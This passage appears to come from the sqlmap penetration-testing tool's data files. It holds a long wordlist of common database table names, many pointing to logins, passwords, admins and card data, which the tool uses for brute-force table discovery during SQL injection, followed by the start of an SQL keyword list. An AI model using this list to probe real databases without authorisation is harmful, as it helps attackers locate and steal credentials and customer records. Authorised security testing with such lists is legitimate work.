Nav\nDataFeedPerformance1\nDataFeedPerformance2\nDataFeedPerformance2_incoming\nDataFeedShowtag1\nDataFeedShowtag2\nDataFeedShowtag2_incoming\ndtproperties\nEvent\nEvent_backup\nEvent_Category\nEventRedirect\nEvents_new\nGenre\nJamPass\nMyTicketek\nMyTicketekArchive\nNews\nPasswords by usage count\nPerfPassword\nPerfPasswordAllSelected\nPromotion\nProxyDataFeedPerformance\nProxyDataFeedShowtag\nProxyPriceInfo\nRegion\nSearchOptions\nSeries\nSheldonshows\nStateList\nStates\nSubCategory\nSubjects\nSurvey\nSurveyAnswer\nSurveyAnswerOpen\nSurveyQuestion\nSurveyRespondent\nsysconstraints\nsyssegments\ntblRestrictedPasswords\ntblRestrictedShows\nTicket System Acc Numbers\nTimeDiff\nTitles\nToPacmail1\nToPacmail2\nTotal Members\nUserPreferences\nuvw_Category\nuvw_Pref\nuvw_Preferences\nVenue\nvenues\nVenuesNew\nX_3945\nstone list\ntblArtistCategory\ntblArtists\ntblConfigs\ntblLayouts\ntblLogBookAuthor\ntblLogBookEntry\ntblLogBookImages\ntblLogBookImport\ntblLogBookUser\ntblMails\ntblNewCategory\ntblNews\ntblOrders\ntblStoneCategory\ntblStones\ntblUser\ntblWishList\nVIEW1\nviewLogBookEntry\nviewStoneArtist\nvwListAllAvailable\nCC_info\nCC_username\ncms_user\ncms_users\ncms_admin\ncms_admins\nuser_name\njos_user\ntable_user\nmail\nbulletin\ncc_info\nlogin_name\nadmuserinfo\nuserlistuser_list\nSiteLogin\nSite_Login\nUserAdmin\nAdmins\nLogin\nLogins\n\n# List from http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html\n\naccount\naccnts\naccnt\nuser_id\nmembers\nusrs\nusr2\naccounts\nadmin\nadmins\nadminlogin\nauth\nauthenticate\nauthentication\naccount\naccess\ncustomers\ncustomer\nconfig\nconf\ncfg\nhash\nlogin\nlogout\nloginout\nlog\nmember\nmemberid\npassword\npass_hash\npass\npasswd\npassw\npword\npwrd\npwd\nstore\nstore1\nstore2\nstore3\nstore4\nsetting\nusername\nname\nuser\nuser_name\nuser_username\nuname\nuser_uname\nusern\nuser_usern\nun\nuser_un\nusrnm\nuser_usrnm\nusr\nusernm\nuser_usernm\nuser_nm\nuser_password\nuserpass\nuser_pass\nuser_pword\nuser_passw\nuser_pwrd\nuser_pwd\nuser_passwd\n\n# List from hyrax (http://sla.ckers.org/forum/read.php?16,36047)\n\nwsop\nAdmin\nConfig\nSettings\ntbl_admin\ntbl_admins\ntbl_member\ntbl_members\ntblservers\nid\nuid\nuserid\nuser_id\nauid\nadminpass\nLoginID\nFirstName\nLastName\ncms_member\ncms_members\nWebmaster\nWebuser\ntbl_tbadmin\nAdminlogin\nuseraccount\nnguoidung\nquanly\nquantri\ndangnhap\ntaikhoan\ntaikhoanquantri\nuseraccounts\nnguoidungs\ntbuser\ntblogin\ntbadmin\ntbaccount\ntbuseraccount\ntbnguoidung\ntbllogin\ntbladmin\ntblaccount\ntbluseraccount\ntblnguoidung\ntbusers\ntblogins\ntbadmins\ntbaccounts\ntbuseraccounts\ntbnguoidungs\ntbllogins\ntblaccounts\ntbluseraccounts\ntblnguoidungs\ntb_account\ntb_useraccount\ntb_nguoidung\ntbl_login\ntbl_account\ntbl_useraccount\ntbl_nguoidung\ntb_logins\ntb_accounts\ntb_useraccounts\ntb_nguoidungs\ntbl_logins\ntbl_accounts\ntbl_useraccounts\ntbl_nguoidungs\ntb_admins\nadminid\nadmin_id\nadminuserid\nadmin_userid\nAdminUID\nadminusername\nadmin_username\nadminname\nadmin_name\nusr\nusr_n\nusrname\nusr_name\nusrnam\nuseradmin\napwd\nadminpaw\nadminpwd\nadmin_pwd\nadmin_pass\nadminpassword\nadmin_password\nadmin_passwords\nusrpass\nusr_pass\npass\nuserpass\nuser_pass\ndbaccount\ndbstudent\ndbstudents\ndbadmin\nuseres\ndbuser\ndbusers\npersonal\ndbpersoon\nlist\nlists\ndblist\nuserpassword\nuser_password\nuserpwd\nuser_pwd\nSecurityLevel\nLastLoginDate\nLoginIP\npword\nad\nKonto\nKonten\nadmin_psw\nverwalten\nverwaltet\nadministrieren\nVerwaltung\nAdministratoren\nadminpsw\nadminupass\nKunst\nArtikel\nAutor\nBuch\nchat\nKunden\ntblnews\nbanner\noptions\ngeneral\nupload\nuploads\nfile\nakhbar\nsb_host_admin\nFirma\ncontenu\nKontakt\nKontakte\nInhalt\nKontrolle\ncontrole\nKunde\nTagebuch\nherunterladen\ndw\nglmm\ngly\nus\nstnuser\nstuser\nstusers\nstuseres\ndbstaff\ndb_staff\nstaff_db\ndatabase\ndatabases\ntest_user\nuser_test\ntest_users\nusers_test\nGruppe\nGruppen\nguanli\nguanliyuan\nh_admin\nBilder\nMitgliederbereich\nkey\nkeywords\nAnmeldung\nProtokolle\nMitglied\nMitgliederliste\nMitglieder\nmima\nmm\nmpassword\nmusername\nFilm\nFilme\nnc\nnew\nNamen\nAuftrag\nBestellungen\nPasswort\npower\npsw\npswd\npw\npwd1\njhu\nwebapps\nASP\nMicrosoft\nsing\nsingup\nsingin\nregisteration\nreg\nregistriert\nroot\nroots\nTagung\nSitzungen\nEinstellungen\nStandorte\nStatistiken\nsys\nSystemadministratoren\nsystime\nTisch\nTabellen\nTitel\nu\nu_n\nu_name\nu_p\nu_pass\nBenutzer\nuser_pw\nBenutzerliste\nuserpasswd\nusr_pw\nusrs\nBenutzername\nBenutzernamen\nvip\nWebbenutzer\nsb_host_adminActiveDataFeed\nKategorie\nLand\nSuchoptionen\nSerie\nStaaten\nUnterkKlasse\nUmfrage\nTotalMembers\nVeranstaltungsort\nVeranstaltungsorte\nAnsicht1\nutilisateur\ntrier\ncompte\ncomptes\nadministrer\nadministrables\nadministrateur\nadministrateurs\nauteur\nlivre\nentreprise\nconcessionnaire\nconcessionnaires\ntelecharger\ngroupe\ngroupes\nliens\nconnexion\nprincipal\ngestionnaire\nmembre\nmembres\nfilms\nnom\nnoms\nordre\ncommandes\npartenaire\npartenaires\npasse\nasse\nenregistrs\nparamtres\nstatistiques\nsuper\ntester\nutilisateurs\nintranet_users\nutlisateur\nCatogorie\nPays\nSujets\nSondage\nTitres\nLieux\nAffichage1Affichage1edu\nwin\npc\nwindows\nmac\nedu\nbayviewpath\nbayview\nserver\nslserver\nColdFusion8\nColdFusion\nCold\nFusion8\nFusion\nststaff\nsb_host_adminAffichage1\nAffichage1\nyhm\nyhmm\nAffichage1name\nsb_host_adminAffichage1name\n\n# site:jp\n\nTypesTab\n\n# site:it\n\nutenti\ncategorie\nattivita\ncomuni\ndiscipline\nClienti\ngws_news\nSGA_XPLAN_TPL_V$SQL_PLAN\nemu_services\nnlconfig\noil_bfsurvey_pro\noil_users\noil_menu_types\noil_polls\nAccounts\noil_core_log_searches\nSGA_XPLAN_TPL_V$SQL_PLAN_SALL\noil_phocadownload_categories\ngws_page\noil_bfsurveypro_choices\noil_poll_data\noil_poll_date\nargomento\noil_modules\nruolo\noil_contact_details\nemu_profiles\nuser_connection\noil_poll_menu\njos_jf_tableinfo\noil_templates_menu\noil_messages_cfg\noil_biolmed_entity_types\noil_phocagallery_votes\noil_core_acl_aro\nregioni\noil_modules_menu\ndati\ngws_admin\noil_phocagallery_user_category\narticoli\noil_content_frontpage\ncron_send\noil_biolmed_measures\ncomune\nSGA_XPLAN_TPL_DBA_TABLES\nesame\noil_session\noil_phocadownload_licenses\noil_weblinks\noil_messages\noil_phocagallery_votes_statistics\ndcerpcbinds\noil_jf_content\nSGA_XPLAN_TPL_DBA_CONS_COLUMNS\nSGA_XPLAN_TPL_DBA_IND_COLUMNS\ngruppi\nArticoli\ngws_banner\ngws_category\nsoraldo_ele_tipo\ndb_version\nSGA_XPLAN_TPL_DBA_TAB_COLS\noil_biolmed_thesis\njos_languages\nmlmail\nSGA_XPLAN_TPL_V$SQLTEXT_NL\noil_bannertrack\noil_core_log_items\noil_rokversions\noil_bfsurveypro_34\noil_bfsurveypro_35\noil_google_destinations\ngws_product\noil_jf_tableinfo\noil_phocadownload\noil_biolmed_blocks\noil_bfsurvey_pro_example\noil_bfsurvey_pro_categories\noil_bannerclient\noil_core_acl_aro_sections\nSGA_XPLAN_TPL_V$SQL\noil_biolmed_land\nconnections\nnot_sent_mails\nsga_xplan_test\noil_languages\nutente\ndocumento\ngws_purchase\noil_plugins\noil_phocagallery\noil_menu\noil_biolmed_measures_by_entity_types\noffers\nanagrafica\ngws_text\noil_groups\noil_content_rating\nsent_mails\noil_banner\noil_google\ngws_jobs\neventi\nmlattach\noil_migration_backlinks\noil_phocagallery_categories\ndownloads\nmlgroup\noil_sections\ndecodifica_tabelle\noil_phocagallery_img_votes\noil_phocagallery_img_votes_statistics\noil_dbcache\noil_content\np0fs\noil_biolmed_entity\noil_rokdownloads\noil_core_acl_groups_aro_map\ngws_client\ndecodifica_campi\noil_phocagallery_comments\noil_categories\noil_newsfeeds\noil_biolmed_measurements\noil_phocadownload_user_stat\noil_core_acl_aro_groups\nSGA_XPLAN_TPL_V$SQL_PLAN_STAT\noil_core_acl_aro_map\ndcerpcrequests\noil_phocadownload_sections\noil_components\ndiscipline_utenti\njos_jf_content\noil_phocadownload_settings\nSGA_XPLAN_TPL_DBA_CONSTRAINTS\noil_biolmed_technician\noil_stats_agents\nSGA_XPLAN_TPL_DBA_INDEXES\n\n# site:fr\n\nAvion\ndepartement\nCompagnie\nproduits\nspip_auteurs\nBDDJoueurs_alliance\nspip_articles\nspip_syndic\npays\nspip_auteurs_rubriques\nspip_mots_forum\nspip_signatures\ndiplomatie\nspip_mots_breves\nspip_forum\nspip_auteurs_messages\nspip_documents\nspip_messages\nspip_index_dico\nspip_meta\nspip_petitions\nspip_mots_syndic\nspip_types_documents\netudiant\nspip_groupes_mots\nspip_documents_articles\nspip_rubriques\nspip_breves\nagenda\nBDDJoueurs_colonies\nspip_mots_articles\nspip_mots\nspip_syndic_articles\nspip_auteurs_articles\nspip_mots_rubriques\nBDDJoueurs\nmodulephoto\nnuke_cities\nforums\nnuke_banner_positions\nnuke_subscriptions\nnuke_downloads_categories\nnuke_journal_comments\nnuke_bbranks\nspip_documents_rubriques\nnuke_confirm\nservice\nnuke_bbthemes_name\nnuke_autonews\nnuke_bbdisallow\nnuke_reviews_add\nEDITEUR\nnuke_links_newlink\nnuke_faqcategories\netudiants\nnuke_stats_year\nnuke_bbsmilies\nspip_mots_documents\nspip_documents_breves\nnuke_bbsearch_results\npost\nnuke_users_temp\nnuke_blocks\nnuke_reviews_main\nthemes\nnuke_modules\nnuke_banner_plans\nnuke_links_votedata\nspip_referers\ninscription\nBONUS\nnuke_links_editorials\nnuke_topics\nnuke_bbprivmsgs_text\nchatbox\nnuke_referer\nnuke_bbauth_access\nnuke_journal_stats\nnuke_faqanswer\nnuke_banner_terms\nmessage\nnuke_bbvote_voters\nnuke_pages_categories\nspip_index\nmodulerubriquephoto\nspip_visites\nRole\nnuke_public_messages\nactualites\nnuke_reviews_comments\nnuke_downloads_votedata\nnuke_headlines\nnuke_downloads_editorials\nenseignant\nmodulemessage\nnuke_session\nnuke_queue\nnuke_main\nnuke_bbposts\nspip_ortho_cache\nEnseignant\nnuke_downloads_newdownload\nsons\nplurielanim\nnuke_bbforums\nnuke_bbsearch_wordmatch\nnuke_bbvote_results\nnuke_stats_date\nnuke_bbwords\nnuke_bbcategories\ntypecompte\nnuke_stories\nnuke_stats_month\npersonne\netablissement\nnuke_counter\nindexation\nnuke_poll_desc\nnuke_links_links\nnuke_bbtopics\nUtilisateurs\nnuke_related\nnuke_downloads_downloads\nspip_versions_fragments\nnuke_bbgroups\nnuke_bbtopics_watch\nnuke_bbuser_group\nnuke_downloads_modrequest\nspip_versions\nJoueur\nnuke_bbsessions\nnuke_links_categories\ndirecteur\nEtudiant\nnuke_bbposts_text\nnuked_page\nPersonne\nnuke_bbbanlist\nParametre\nnuke_pollcomments\nnuke_bbforum_prune\nnuke_pages\nnuke_links_modrequest\nnuke_stats_hour\nnuke_groups_points\nnuke_reviews\nnuke_bbthemes\nmodulemailling\nagence\nnuke_encyclopedia\nnuke_bbsearch_wordlist\nnuke_message\nEquipe\nnuke_comments\nnuke_poll_check\nnuke_journal\nnuke_stories_cat\nnuke_banner\nnuke_groups\nspip_visites_articles\nnuke_encyclopedia_text\nspip_referers_articles\nnuke_bbvote_desc\nArtiste\nnuke_poll_data\nnuke_bbprivmsgs\nspip_ortho_dico\nspip_caches\n\n# site:ru\n\nguestbook\nbinn_forum_settings\nbinn_forms_templ\nbinn_catprops\ncurrency\nbinn_imagelib\nbinn_news\nphpshop_opros_categories\nbinn_articles_messages\nbinn_cache\nbinn_bann_temps\nbinn_forum_threads\nvoting\nbinn_update\nterms\nbinn_site_users_rights\nbinn_vote_options\nbinn_texts\nbinn_forum_temps\nbinn_order_temps\nbinn_basket\nbinn_order\nbinn_system_log\nbinn_vote_results\nbinn_articles\nphpshop_categories\nbinn_maillist_temps\nbinn_system_messages\nbinn_articles_temps\nbinn_search_temps\nbanners\nbinn_imagelib_templ\nbinn_faq\nbinn_bann\nphpshop_news\nbinn_menu_templ\nbinn_maillist_settings\nbinn_docs_temps\nbinn_bann_restricted\nphpshop_system\nbinn_calendar_temps\nbinn_forum_posts\nbinn_cform_settings\nphpshop_baners\nphpshop_menu\nbinn_forms_fields\nbinn_cform_list\nbinn_vote\nphpshop_links\nmapdata\nbinn_submit_timeout\nbinn_forum_themes_temps\nbinn_order_elems\nbinn_templates\nbinn_cform\nbinn_catalog_template\nbinn_ct_templ_elems\nbinn_template_elems\nbinn_rubrikator_tlevel\nbinn_settings\nbinn_pages\nbinn_users\nbinn_categs\nbinn_page_elems\nbinn_site_users_temps\nbinn_vote_temps\nbinn_rubrikator_temps\nbinn_faq_temps\nbinn_sprav\nsetup_\nbinn_basket_templ\nbinn_forum_maillist\nbinn_news_temps\nphpshop_users\nbinn_catlinks\nbinn_sprav_temps\nbinn_maillist_sent\nbinn_forms_templ_elems\njubjub_errors\nbinn_maillist\nbinn_catrights\nbinn_docs\nbinn_bann_pages\nbinn_ct_templ\nbinn_menu\nbinn_user_rights\nbinn_cform_textarea\nbinn_catalog_fields\nvykachka\nbinn_menu_tlevel\nphpshop_opros\nbinn_form39\nbinn_site_users\nbinn_path_temps\norder_item\n\n# site:de\n\ntt_content\nkunde\nmedien\nMitarbeiter\nfe_users\ndwp_wetter\ndwp_popup\nvoraussetzen\ndwp_foto_pictures\ndwp_karte_speisen\ndwp_news_kat\ndwp_structur\ndwp_foto_album\ndwp_karte_kat\nbestellung\ndwp_content\nbe_users\nVorlesungen\ndwp_content_pic\ndwp_link_entries\ndwp_ecard_album\npersons\ndwp_buchung_hotel\ndwp_link_kat\ndwp_news_absatz\nAssistenten\nProfessoren\nStudenten\ndwp_ecard_pictures\nlieferant\ndwp_bewertung\nmitarbeiter\ngruppe\ndwp_news_head\nwp_post2cat\nphpbb_forum_prune\ncrops\nmein_doc\nartikel_kategorie\nkategorien\nrel_person_paper\ntx_tcdirectmail_bounceaccount\nAkten\nskins\nriddles\nci_slogans\nphpbb_vote_voters\naccount_map_event\nroles\nstellen\nmeetings\nspecial_category\nrel_paper_topic\nkbase_category\nattribut\nphpbb_auth_access\nzo_gruppe_stelle\nzo_kontakt_stelle\nhoeren\nshop_settings\ntutorial\nmotd_coding\nartikel_variationsgruppen\ndwp_kontakt\npapers\ngesuche\nzahlung_weitere\nts2_server_privileges\nartikel_variationen\nartikel_optionen\nchessgames\nportale\nproducts_images\nphpbb_privmsgs_text\nkurs\nKUNDE\nwp_linkcategories\ntx_tcdirectmail_targets\ntx_templavoila_datastructure\nAdresse\nbestellung_kunde\nrel_person_topic\ncss_file\nvisual\naccount_multi\nAdressen\nphpbb_words\nphpbb_disallow\nkauf_artikel\nmusic_association\nphpbb_banlist\ndokumente\ngreylist\nbackup\nmap_event\nkreditkarte\nhouse_extensions\naddress_book\ncrops_tpl\nphpbb_vote_desc\nversandkostenpreise\npruefen\ngruppen\nvertreter\nphpbb_confirm\nverkaeufer\nbe_groups\nrel_person_organization\nphpbb_privmsgs\nbuecher\nkategorie\nphpbb_sessions\nphpbb_search_results\nstudierende\nuser_online_newyear\nhersteller\nobject_link\nadresse\naddress_format\nnewsletter_recipients\nPERMISSIONS\nuser_uploads_pictures\nfestplatte\nveranstalter\nmein_doc_h\ntx_tcdirectmail_clicklinks\nphpbb_vote_results\nphpbb_topics_watch\ntx_tcdirectmail_lock\naccount_map\nstandort\ngd\ndelete_reasons\ntx_tcdirectmail_sentlog\nvalhalla\nvis_typen\ncounter\nkbase_main\nmusic_items\nkauf\npayment_qenta\nseite_abschnitt\ntrivia\nmehrwertsteuer\nmassenmail\nklassen\nhilfe\ngeraet\ntt_address\ndg_books\nportal_access\norders_recalculate\nartikel_bestellung\nkontakt\nchesshistory\nnotizen\nseite_layout\nvirgator_table\nwp_categories\nchessmessages\n\n# site:br\n\nendereco\npessoa\nusuarios\nestado\npedidos\nCLIENTE\nitens\ntelefone\nempresa\nPRODUTO\ncategoria\ncidades\nclientes\nprodutos\nmunicipio\ncliente\nLT_PROCEDIMENTO\ncalendario\nD_US_FAVORITOS\nmoradia\npessoa_telefone\ncontador\naidf\nresumo\nadd_irm\nM_ESQUEMA_PERMISSAO\nduvida\nLT_METODO_ATUALIZACAO\nM_RELATORIOS\nLT_SERIE\nestados\nLT_OBJETO\ncidade\ndeclaracaonf\nespecieaidf\nS_SESSOES\nD_PR_HONORARIOS\nempresa_atividade\ncorrecaostrategy\njos_docman_groups\nD_US_RECENTE\nnotafiscal\nsolicitacao\npessoa_endereco\natividade\nM_FATURAS\nD_PR_APENSOS\nagencia\nLT_LANCAMENTO\nD_US_AREA_DE_TRABALHO\nD_FA_ITENS\ndist_universidade\nmultastrategy_faixamulta\nLT_TIPO_DE_ACAO\nD_PR_EVENTOS\nD_FA_PARCELAS\ntipodeducao\nD_PR_PARCELAMENTO\nsala\nD_US_EQUIPES_DO_USUARIO\ncidadao\ndocumentos\nS_GLOBAL\nM_CADASTRO_GERAL\njos_docman_licenses\nguiaavulsa\nsolicitacaosenha\nM_CUBOS\npromocoes\ngrau_escolaridade\nimagens\nmultastrategy\nD_PR_PARTES\nprocesso\ngestor\nimagem\ncategorias\nLT_CLASSE_FORO\njurosstrategy\ndeducao\nS_PARAMETROS\nnotafiscal_deducao\nCAIXA\nfoto\nM_FERIADOS\nS_ORIGENS\nguiaavulsa_itemguiaavulsa\nsituacaoitem\nnotafiscal_itemnotafiscal\ncotacao\npapel\nM_EMAIL_FILA\nD_PR_OBJETOS\ndados_prefeitura\nS_LOG\nLT_FASE\nD_PR_ADVOGADOS\nM_USUARIO\nprojeto\nLT_SITUACAO\nD_PR_CUSTAS\ngrupoatividade\nLT_NATUREZA\nmembros_familia\ninstituicao\nemprestimos\nitemguiaavulsa\nD_EM_DESTINATARIO\nLT_GRUPO\nS_SEQUENCIAS\nitemnotafiscal\ndisciplina\njos_docman\nautorizacaonfe\ntipo_bolsa\nestoque\nLT_JURISDICAO\nserie\nsse_estudante\nLT_FOROS\nperfil\ndespesa_familia\nnoticias\nLT_GARANTIA\nM_ESQUEMA_HORARIO\nMM_NOTIFICACOES_DO_PROCESSO\njos_jce_plugins\ngrau_parentesco\nD_PR_GARANTIAS\nM_SERVICOS_PRESTADOS\nLT_CATEGORIA\nfaixamulta\nencerramento\nM_PROCESSOS\ndados_familia\nMM_USUARIOS_DO_PROCESSO\nLT_ENCERRAMENTO\nLT_DECISAO\nindice\ncontador_empresa\nsse_familia\nD_SE_INDICES\ncursos\nestado_civil\ndados_estudante\nLT_EQUIPES\nLT_PROGNOSTICO\nLT_EVENTO\njos_jce_groups\nD_PR_DOCUMENTOS\nD_PR_DESDOBRAMENTOS\nlogradouro\ndespesa_aluno\nfiscal\nLT_CUSTOM4\nconvite\nmanutencao\nLT_CUSTOM1\nLT_CUSTOM2\nLT_CUSTOM3\n\n# site:es\n\njos_respuestas\nDEPARTAMENTO\nEMPLEADO\nTRABAJA_EN\nDEPENDIENTE\nLOCALIZACIONES_DEPT\nPROYECTO\nlineas_fac\npueblos\nNUEVOS\nCENTROS\nBANCOS\nPERSONAL\nSUCURSALES\nPRODUCTOS\nprovincias\njos_estadisticas\nUSUARIO\nALUM\nMOVIMIENTOS\nACTOR\nnuke_gallery_rate_check\nANTIGUOS\nCUENTAS\nvendedores\nCLIENTES\narticulos\nDEPARTAMENTOS\nPROFESORES\njos_preguntas\nPEDIDOS\nEMPLEADOS\nnuke_gallery_pictures_newpicture\nBooks\ngrupo\nfacturas\naclaraciones\npreguntas\npersonas\nestadisticas\n\n# site:cn\n\nurl\ncdb_adminactions\nBlockInfo\ncdb_attachtypes\ncdb_attachments\nmymps_lifebox\ncdb_buddys\nmymps_payapi\nLastDate\ncdb_medals\nmymps_payrecord\ncdb_forumlinks\ncdb_adminnotes\ncdb_admingroups\ncdb_creditslog\nstkWeight\nmymps_checkanswer\ncdb_announcements\ncdb_bbcodes\ncdb_advertisements\ncdb_memberfields\nmymps_telephone\ncdb_forums\ncdb_forumfields\ncdb_favorites\ncdb_banned\ncdb_crons\ncdb_access\ncdb_invites\nsysmergeschemaarticles\nCodeRuleType\ncdb_membermagics\ncdb_imagetypes\ncdb_memberspaces\ncdb_campaigns\npw_wordfb\ncdb_paymentlog\ncdb_adminsessions\npw_adminset\nseen\nt_snap\nMSmerge_altsyncpartners\nzl_deeds\npw_styles\npw_announce\ncdb_pluginvars\npw_smiles\ncdb_modworks\nncat\nmymps_member_tpl\npw_threads\nzl_admin\ncdb_onlinetime\ncdb_mythreads\ncdb_members\nspt_datatype_info\nmymps_certification\nmymps_badwords\nseentype\nmymps_cache\nzl_article\nspt_datatype_info_ext\ncdb_debateposts\nmymps_corp\nmymps_member_album\nmgbliuyan\npw_schcache\nzl_finance\npw_banuser\nmymps_news\ncdb_pluginhooks\nmymps_member_docutype\nwp1_categories\ncdb_magicmarket\nMSmerge_errorlineage\ncdb_activities\nzl_baoming\ncdb_orders\nad_ad\ncdb_pms\ncdb_magics\ncdb_itempool\nphpcms_announce\npw_actions\npw_msg\nmymps_news_img\ncdb_debates\ncdb_magiclog\npw_forums\nmymps_channel\ncdb_polls\nt_stat\npw_attachs\ncdb_plugins\npw_membercredit\ncdb_posts\nmymps_member_category\ncdb_activityapplies\nzl_media\nacctmanager\npw_usergroups\ncdb_faqs\ncdb_onlinelist\npw_hack\nmymps_member_comment\nMarket\nmymps_config\nmymps_mail_template\nmymps_advertisement\nMSrepl_identity_range\npw_favors\nmymps_crons\npw_config\npw_credits\ncdb_failedlogins\nmymps_member_docu\npw_posts\ncdb_attachpaymentlog\ncdb_myposts\ncdb_polloptions\nwp1_comments\ncdb_caches\npw_members\nmymps_upload\nspt_provider_types\npw_sharelinks\npw_tmsgs\npw_polls\ncdb_moderators\npw_bbsinfo\naliasregex\nuserfiles\nacctmanager2\ncdb_pmsearchindex\nmymps_news_focus\ncdb_forumrecommend\npublishers\nzl_advertisement\nguanggaotp\npw_memberinfo\naliastype\nmymps_mail_sendlist\nmymps_navurl\n\n# site:tr\n\nkullanici\nkullanicilar\nyonetici\nyoneticiler\nadres\nadresler\nyayincilar\nyayinci\nurun\nurunler\nkategori\nkategoriler\nulke\nulkeler\nsiparis\nsiparisler\nbayi\nbayiler\nstok\nreklam\nreklamlar\nsite\nsiteler\nsayfa\nsayfalar\nicerik\nicerikler\nyazi\nyazilar\ngenel\nistatistik\nistatistikler\nduyuru\nduyurular\nhaber\nhaberler\nkomisyon\nucret\nucretler\nbilgi\nbasvuru\nbasvurular\nkontak\nkontaklar\n\n# List provided by Pedrito Perez (0ark1ang3l@gmail.com)\n\nadminstbl\nadmintbl\naffiliateUsers\nhsa_user\ntblmanager\ntblmanagers\ntblproduct\ntblproducts\ntuser\ntusers\nuserstbl\nusertbl\n\n# WebGoat\n\nuser_data\n\n# https://laurent22.github.io/so-injections/\n\naccounts\nadmin\nbaza_site\nbenutzer\ncategory\ncomments\ncompany\ncredentials\nCustomer\ncustomers\ndata\ndetails\ndhruv_users\ndt_tb\nemployees\nevents\nforsale\nfriends\ngiorni\nimages\ninfo\nitems\nkontabankowe\nlogin\nlogs\nmarkers\nmembers\nmessages\norders\norder_table\nphotos\nplayer\nplayers\npoints\nregister\nreports\nrooms\nshells\nsignup\nsongs\nstudent\nstudents\ntable\ntable2\ntbl_images\ntblproduct\ntestv2\ntickets\ntopicinfo\ntrabajo\nuser\nuser_auth\nuserinfo\nuser_info\nuserregister\nusers\nusuarios\nutenti\nwm_products\nwp_payout_history\nzamowienia\n\n# https://deliciousbrains.com/tour-wordpress-database/\n\nwp_blogmeta\nwp_blogs\nwp_blog_versions\nwp_commentmeta\nwp_comments\nwp_links\nwp_options\nwp_postmeta\nwp_posts\nwp_registration_log\nwp_signups\nwp_site\nwp_sitemeta\nwp_termmeta\nwp_term_relationships\nwp_terms\nwp_term_taxonomy\nwp_usermeta\nwp_users\n\n# https://docs.joomla.org/Tables\n\nassets\nbannerclient\nbanner\nbannertrack\ncategories\ncomponents\ncontact_details\ncontent_frontpage\ncontent_rating\ncontent\ncore_acl_aro_groups\ncore_acl_aro_map\ncore_acl_aro_sections\ncore_acl_aro\ncore_acl_groups_aro_map\ncore_log_items\ncore_log_searches\nextensions\ngroups\nlanguages\nmenu\nmenu_types\nmessages_cfg\nmessages\nmigration_backlinks\nmodules_menu\nmodules\nnewsfeeds\nplugins\npoll_data\npoll_date\npoll_menu\npolls\nredirect_links\nSchemas\nsections\nsession\nstats_agents\ntemplates_menu\ntemplate_styles\nupdate_categories\nupdate_sites_extensions\nupdate_sites\nupdates\nusergroups\nuser_profiles\nusers\nuser_usergroup_map\nviewlevels\nweblinks\n"
  },
  {
    "path": "sqlmap/data/txt/keywords.txt",
    "content": "# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\n# See the file 'LICENSE' for copying permission\n\n# SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml)\n\nABSOLUTE\nACTION\nADD\nALL\nALLOCATE\nALTER\nAND\nANY\nARE\nAS\nASC\nASSERTION\nAT\nAUTHORIZATION\nAVG\nBEGIN\nBETWEEN\nBIT\nBIT_LENGTH\nBOTH\nBY\nCALL\nCASCADE\nCASCADED\nCASE\nCAST\nCATALOG\nCHAR\nCHAR_LENGTH\nCHARACTER\nCHARACTER_LENGTH\nCHECK\nCLOSE\nCOALESCE\nCOLLATE\nCOLLATION\nCOLUMN\nCOMMIT\nCONDITION\nCONNECT\nCONNECTION\nCONSTRAINT\nCONSTRAINTS\nCONTAINS\nCONTINUE\nCONVERT\nCORRESPONDING\nCOUNT\nCREATE\nCROSS\nCURRENT\nCURRENT_DATE\nCURRENT_PATH\nCURRENT_TIME\nCURRENT_TIMESTAMP\nCURRENT_USER\nCURSOR\nDATE\nDAY\nDEALLOCATE\nDEC\nDECIMAL\nDECLARE\nDEFAULT\nDEFERRABLE\nDEFERRED\nDELETE\nDESC\nDESCRIBE\nDESCRIPTOR\nDETERMINISTIC\nDIAGNOSTICS\nDISCONNECT\nDISTINCT\nDO\nDOMAIN\nDOUBLE\nDROP\nELSE\nELSEIF\nEND\nESCAPE\nEXCEPT\nEXCEPTION\nEXEC\nEXECUTE\nEXISTS\nEXIT\nEXTERNAL\nEXTRACT\nFALSE\nFETCH\nFIRST\nFLOAT\nFOR\nFOREIGN\nFOUND\nFROM\nFULL\nFUNCTION\nGET\nGLOBAL\nGO\nGOTO\nGRANT\nGROUP\nHANDLER\nHAVING\nHOUR\nIDENTITY\nIF\nIMMEDIATE\nIN\nINDICATOR\nINITIALLY\nINNER\nINOUT\nINPUT\nINSENSITIVE\nINSERT\nINT\nINTEGER\nINTERSECT\nINTERVAL\nINTO\nIS\nISOLATION\nJOIN\nKEY\nLANGUAGE\nLAST\nLEADING\nLEAVE\nLEFT\nLEVEL\nLIKE\nLOCAL\nLOOP\nLOWER\nMATCH\nMAX\nMIN\nMINUTE\nMODULE\nMONTH\nNAMES\nNATIONAL\nNATURAL\nNCHAR\nNEXT\nNO\nNOT\nNULL\nNULLIF\nNUMERIC\nOCTET_LENGTH\nOF\nON\nONLY\nOPEN\nOPTION\nOR\nORDER\nOUT\nOUTER\nOUTPUT\nOVERLAPS\nPAD\nPARAMETER\nPARTIAL\nPATH\nPOSITION\nPRECISION\nPREPARE\nPRESERVE\nPRIMARY\nPRIOR\nPRIVILEGES\nPROCEDURE\nREAD\nREAL\nREFERENCES\nRELATIVE\nREPEAT\nRESIGNAL\nRESTRICT\nRETURN\nRETURNS\nREVOKE\nRIGHT\nROLLBACK\nROUTINE\nROWS\nSCHEMA\nSCROLL\nSECOND\nSECTION\nSELECT\nSESSION\nSESSION_USER\nSET\nSIGNAL\nSIZE\nSMALLINT\nSOME\nSPACE\nSPECIFIC\nSQL\nSQLCODE\nSQLERROR\nSQLEXCEPTION\nSQLSTATE\nSQLWARNING\nSUBSTRING\nSUM\nSYSTEM_USER\nTABLE\nTEMPORARY\nTHEN\nTIME\nTIMESTAMP\nTIMEZONE_HOUR\nTIMEZONE_MINUTE\nTO\nTRAILING\nTRANSACTION\nTRANSLATE\nTRANSLATION\nTRIM\nTRUE\nUNDO\nUNION\nUNIQUE\nUNKNOWN\nUNTIL\nUPDATE\nUPPER\nUSAGE\nUSER\nUSING\nVALUE\nVALUES\nVARCHAR\nVARYING\nVIEW\nWHEN\nWHENEVER\nWHERE\nWHILE\nWITH\nWORK\nWRITE\nYEAR\nZONE\n\n# MySQL 5.0 keywords (reference: 